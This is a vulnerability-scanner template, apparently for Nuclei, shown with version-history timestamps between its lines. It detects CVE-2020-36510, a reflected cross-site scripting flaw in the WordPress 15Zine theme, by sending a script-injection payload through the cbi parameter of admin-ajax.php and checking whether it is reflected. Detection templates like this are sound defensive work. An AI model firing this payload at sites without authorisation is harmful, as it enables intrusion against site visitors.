2022-05-11 12:50:11 +00:00
id : CVE-2020-36510
info :
2022-08-16 14:14:41 +00:00
name : WordPress 15Zine <3.3.0 - Cross-Site Scripting
2022-05-11 12:50:11 +00:00
author : veshraj
severity : medium
description : |
2022-08-16 14:14:41 +00:00
WordPress 15Zine before 3.3.0 is vulnerable to reflected cross-site scripting because the theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action.
2023-09-06 12:22:36 +00:00
remediation : |
Update WordPress 15Zine to version 3.3.0 or later to mitigate the vulnerability.
2022-05-11 12:50:11 +00:00
reference :
- https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95
2022-08-16 14:14:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-36510
2022-05-11 13:16:45 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2023-04-12 10:55:48 +00:00
cvss-score : 6.1
2022-05-11 13:16:45 +00:00
cve-id : CVE-2020-36510
cwe-id : CWE-79
2023-08-31 11:46:18 +00:00
epss-score : 0.00141
epss-percentile : 0.49173
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:*
2022-05-12 11:28:57 +00:00
metadata :
2023-04-12 10:55:48 +00:00
verified : "false"
2023-09-06 12:22:36 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : codetipi
product : 15zine
2023-09-06 12:22:36 +00:00
framework : wordpress
2022-08-27 04:41:18 +00:00
tags : xss,wordpress,wp-theme,wp,cve,cve2020,wpscan
2022-05-11 12:50:11 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-11 12:50:11 +00:00
- method : GET
path :
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-05-12 11:30:02 +00:00
- "</script><script>alert(document.domain)</script>"
2022-05-11 12:50:11 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200